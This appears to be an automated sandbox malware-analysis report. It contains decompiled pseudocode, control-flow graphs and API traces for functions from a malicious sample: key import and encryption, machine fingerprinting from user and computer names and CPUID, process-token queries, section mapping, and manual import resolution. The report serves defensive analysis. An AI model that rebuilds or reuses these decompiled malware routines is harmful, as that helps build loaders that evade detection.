            control_flow_graph 153 7e1508-7e1548 CryptAcquireContextW 154 7e154e-7e158a memcpy CryptImportKey 153->154 155 7e169f-7e16a5 GetLastError 153->155 156 7e168a-7e1690 GetLastError 154->156 157 7e1590-7e15a2 CryptSetKeyParam 154->157 158 7e16a8-7e16af 155->158 161 7e1693-7e169d CryptReleaseContext 156->161 159 7e15a8-7e15b1 157->159 160 7e1676-7e167c GetLastError 157->160 162 7e15b9-7e15c6 call 7e33dc 159->162 163 7e15b3-7e15b5 159->163 164 7e167f-7e1688 CryptDestroyKey 160->164 161->158 168 7e15cc-7e15d5 162->168 169 7e166d-7e1674 162->169 163->162 165 7e15b7 163->165 164->161 165->162 170 7e15d8-7e15e0 168->170 169->164 171 7e15e5-7e1602 memcpy 170->171 172 7e15e2 170->172 173 7e161d-7e1629 171->173 174 7e1604-7e161b CryptEncrypt 171->174 172->171 175 7e1632-7e1634 173->175 174->175 176 7e1636-7e1640 175->176 177 7e1644-7e164f GetLastError 175->177 176->170 178 7e1642 176->178 179 7e1663-7e166b call 7e61da 177->179 180 7e1651-7e1661 177->180 178->180 179->164 180->164
            C-Code - Quality: 50%
            			E007E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x7ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x7ea0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E007E33DC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x7ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x7ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E007E61DA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























            0x007e1511
            0x007e1517
            0x007e151a
            0x007e1520
            0x007e1520
            0x007e1522
            0x007e1524
            0x007e1527
            0x007e152d
            0x007e152e
            0x007e152f
            0x007e1535
            0x007e153a
            0x007e1540
            0x007e1548
            0x007e16a5
            0x007e154e
            0x007e1550
            0x007e1559
            0x007e155e
            0x007e1570
            0x007e1573
            0x007e1577
            0x007e157e
            0x007e1582
            0x007e158a
            0x007e1690
            0x007e1590
            0x007e1590
            0x007e1594
            0x007e1595
            0x007e1597
            0x007e15a2
            0x007e167c
            0x007e15a8
            0x007e15a8
            0x007e15ab
            0x007e15b1
            0x007e15b7
            0x007e15b7
            0x007e15bf
            0x007e15c1
            0x007e15c6
            0x007e166d
            0x007e15cc
            0x007e15d2
            0x007e15d5
            0x007e15d8
            0x007e15da
            0x007e15db
            0x007e15e0
            0x007e15e2
            0x007e15e2
            0x007e15ec
            0x007e15f1
            0x007e15f4
            0x007e15f7
            0x007e15f9
            0x007e1602
            0x007e162c
            0x007e1604
            0x007e1615
            0x007e1615
            0x007e1634
            0x00000000
            0x00000000
            0x007e1636
            0x007e1639
            0x007e163c
            0x007e1640
            0x00000000
            0x007e1642
            0x007e1651
            0x007e1657
            0x007e165f
            0x007e165f
            0x00000000
            0x007e1640
            0x007e1644
            0x007e164a
            0x007e164f
            0x007e1666
            0x00000000
            0x00000000
            0x00000000
            0x007e164f
            0x007e15c6
            0x007e167f
            0x007e1682
            0x007e1682
            0x007e1697
            0x007e1697
            0x007e16af

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,007E5088,00000001,007E3ECE,00000000), ref: 007E1540
            • memcpy.NTDLL(007E5088,007E3ECE,00000010,?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740), ref: 007E1559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 007E1582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 007E159A
            • memcpy.NTDLL(00000000,7491C740,02F19600,00000010), ref: 007E15EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02F19600,00000020,?,?,00000010), ref: 007E1615
            • GetLastError.KERNEL32(?,?,00000010), ref: 007E1644
            • GetLastError.KERNEL32 ref: 007E1676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 007E1682
            • GetLastError.KERNEL32 ref: 007E168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 007E1697
            • GetLastError.KERNEL32(?,?,?,007E5088,00000001,007E3ECE,00000000,?,007E66D9,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E169F
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID:
            • API String ID: 3401600162-0
            • Opcode ID: 44d91918d65bce639972546cb792f2d692c09fe946548c8e80ede90ccffe6869
            • Instruction ID: f0c7e8f706b8755f921807f829077c152f79bcfcb47c73a06d5b6aa845269f64
            • Opcode Fuzzy Hash: 44d91918d65bce639972546cb792f2d692c09fe946548c8e80ede90ccffe6869
            • Instruction Fuzzy Hash: 0B517BB1901289FFDB10DFA5CC89AAE7BB9FB48340F148429F915E6150D7789E14DB21
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E3BD3 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 225 7e3bd3-7e3be7 226 7e3be9-7e3bee 225->226 227 7e3bf1-7e3c03 call 7e71cd 225->227 226->227 230 7e3c57-7e3c64 227->230 231 7e3c05-7e3c15 GetUserNameW 227->231 232 7e3c66-7e3c7d GetComputerNameW 230->232 231->232 233 7e3c17-7e3c27 RtlAllocateHeap 231->233 234 7e3c7f-7e3c90 RtlAllocateHeap 232->234 235 7e3cbb-7e3cdf 232->235 233->232 236 7e3c29-7e3c36 GetUserNameW 233->236 234->235 239 7e3c92-7e3c9b GetComputerNameW 234->239 237 7e3c38-7e3c44 call 7e56b9 236->237 238 7e3c46-7e3c55 HeapFree 236->238 237->238 238->232 241 7e3cac-7e3cb5 HeapFree 239->241 242 7e3c9d-7e3ca9 call 7e56b9 239->242 241->235 242->241
            C-Code - Quality: 96%
            			E007E3BD3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x7ea310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E007E71CD( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x7ea344 ^ 0x6c7261ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x7ea2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E007E56B9(_v8 + _v8, _t64);
							}
							HeapFree( *0x7ea2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x7ea2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E007E56B9(_v8 + _v8, _t64);
						}
						HeapFree( *0x7ea2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















            0x007e3bd3
            0x007e3bdb
            0x007e3bdf
            0x007e3be2
            0x007e3be7
            0x007e3be9
            0x007e3bee
            0x007e3bee
            0x007e3bf4
            0x007e3bf6
            0x007e3c03
            0x007e3c64
            0x007e3c05
            0x007e3c0a
            0x007e3c10
            0x007e3c15
            0x007e3c23
            0x007e3c27
            0x007e3c36
            0x007e3c3d
            0x007e3c44
            0x007e3c44
            0x007e3c4f
            0x007e3c4f
            0x007e3c27
            0x007e3c15
            0x007e3c66
            0x007e3c6c
            0x007e3c76
            0x007e3c78
            0x007e3c7d
            0x007e3c8c
            0x007e3c90
            0x007e3c9b
            0x007e3ca2
            0x007e3ca9
            0x007e3ca9
            0x007e3cb5
            0x007e3cb5
            0x007e3c90
            0x007e3cc0
            0x007e3cc2
            0x007e3cc5
            0x007e3cc7
            0x007e3cca
            0x007e3ccd
            0x007e3cd7
            0x007e3cdb
            0x007e3cdf

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 007E3C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 007E3C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 007E3C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 007E3C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 007E3C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 007E3C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E3CB5
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID:
            • API String ID: 3239747167-0
            • Opcode ID: be49a5218d65a391a85a86adc3f22a1767e76c2c5d51182e5427c2be799e71c7
            • Instruction ID: ed52ca62ade6125882aa75a57f73324f36b08506d6e335cb243e8f915f327f5b
            • Opcode Fuzzy Hash: be49a5218d65a391a85a86adc3f22a1767e76c2c5d51182e5427c2be799e71c7
            • Instruction Fuzzy Hash: 7B312D72601245EFD710DF69CDC5A6AB7F9FB4C700F618429E505E7260E738EE109B24
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81filetimeCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 359 4015b0-401607 GetSystemTimeAsFileTime 362 401609 359->362 363 40160e-401627 CreateFileMappingW 359->363 362->363 364 401671-401677 GetLastError 363->364 365 401629-401632 363->365 368 401679-40167f 364->368 366 401642-401650 MapViewOfFile 365->366 367 401634-40163b GetLastError 365->367 370 401660-401666 GetLastError 366->370 371 401652-40165e 366->371 367->366 369 40163d-401640 367->369 372 401668-40166f CloseHandle 369->372 370->368 370->372 371->368 372->368
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402026();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x4051ca);
				_push(_t15 + 0x4051c0);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402020();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














            0x004015b0
            0x004015b9
            0x004015bd
            0x004015c3
            0x004015c8
            0x004015cd
            0x004015d0
            0x004015d3
            0x004015d8
            0x004015d9
            0x004015dc
            0x004015e7
            0x004015ee
            0x004015f2
            0x004015f4
            0x004015f5
            0x004015f8
            0x004015fd
            0x00401607
            0x00401609
            0x00401609
            0x0040161d
            0x00401623
            0x00401627
            0x00401677
            0x00401629
            0x00401632
            0x00401648
            0x00401650
            0x00401662
            0x00401666
            0x00000000
            0x00000000
            0x00401652
            0x00401655
            0x0040165a
            0x0040165c
            0x0040165c
            0x0040163d
            0x0040163f
            0x00401668
            0x00401669
            0x00401669
            0x00401632
            0x0040167f

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E421F Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 38%
            			E007E421F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E007E33DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E007E61DA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















            0x007e422c
            0x007e422d
            0x007e422e
            0x007e422f
            0x007e4230
            0x007e4234
            0x007e423b
            0x007e424a
            0x007e424d
            0x007e4250
            0x007e4257
            0x007e425a
            0x007e425d
            0x007e4260
            0x007e4263
            0x007e426e
            0x007e4270
            0x007e4279
            0x007e4281
            0x007e4283
            0x007e4295
            0x007e429f
            0x007e42a3
            0x007e42b2
            0x007e42b6
            0x007e42bf
            0x007e42c7
            0x007e42c7
            0x007e42c9
            0x007e42c9
            0x007e42d1
            0x007e42d7
            0x007e42db
            0x007e42db
            0x007e42e6

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 007E4266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 007E4279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007E4295
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 007E42B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 007E42BF
            • NtClose.NTDLL(?), ref: 007E42D1
            • NtClose.NTDLL(00000000), ref: 007E42DB
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: 6821abde7f83c43e8cc47b93973194ee6ae32ccc842db9618795f9aecaaeb4ce
            • Instruction ID: cf9bdb74bc41d2b2f4e59987da2384be6dc984b937605d806e178dd438e9cb45
            • Opcode Fuzzy Hash: 6821abde7f83c43e8cc47b93973194ee6ae32ccc842db9618795f9aecaaeb4ce
            • Instruction Fuzzy Hash: 6F2126B290115DEBDB019F95CC85ADEBFBDFB08750F108022FA05E6120D7759B509BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401459(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















            0x00401114
            0x0040111b
            0x0040111c
            0x0040111d
            0x0040111e
            0x0040111f
            0x00401130
            0x00401134
            0x00401148
            0x0040114b
            0x0040114e
            0x00401155
            0x00401158
            0x0040115f
            0x00401162
            0x00401165
            0x00401168
            0x0040116d
            0x004011a8
            0x0040116f
            0x00401172
            0x00401178
            0x0040117d
            0x00401181
            0x0040119f
            0x00401183
            0x0040118a
            0x00401198
            0x00401198
            0x00401181
            0x004011b0

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x43175ac3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x43175a44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x43175ac3;
										}
										 *_v16 = _t55;
										_t58 = _t59 * 4 - 0xc5d6b08;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0xbce8a5bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























            0x00401000
            0x00401009
            0x0040100e
            0x00401014
            0x0040101d
            0x00401023
            0x00401025
            0x00401028
            0x0040102d
            0x00401034
            0x00401034
            0x00401038
            0x0040103e
            0x00401043
            0x00000000
            0x00000000
            0x00401049
            0x00401053
            0x00401055
            0x00401058
            0x0040105b
            0x0040105f
            0x00401067
            0x00401069
            0x0040106c
            0x004010d4
            0x004010d4
            0x004010d8
            0x00000000
            0x00000000
            0x00401071
            0x00401077
            0x00401079
            0x0040108c
            0x0040108f
            0x0040108f
            0x0040108f
            0x00401093
            0x0040107b
            0x0040107b
            0x00401083
            0x00401085
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00401085
            0x00401073
            0x00401073
            0x00401087
            0x00401087
            0x00401087
            0x00401096
            0x00401099
            0x0040109b
            0x004010a2
            0x0040109d
            0x0040109d
            0x0040109d
            0x004010aa
            0x004010b0
            0x004010b2
            0x004010e2
            0x004010b4
            0x004010b4
            0x004010b7
            0x004010b9
            0x004010c1
            0x004010c1
            0x004010c6
            0x004010c8
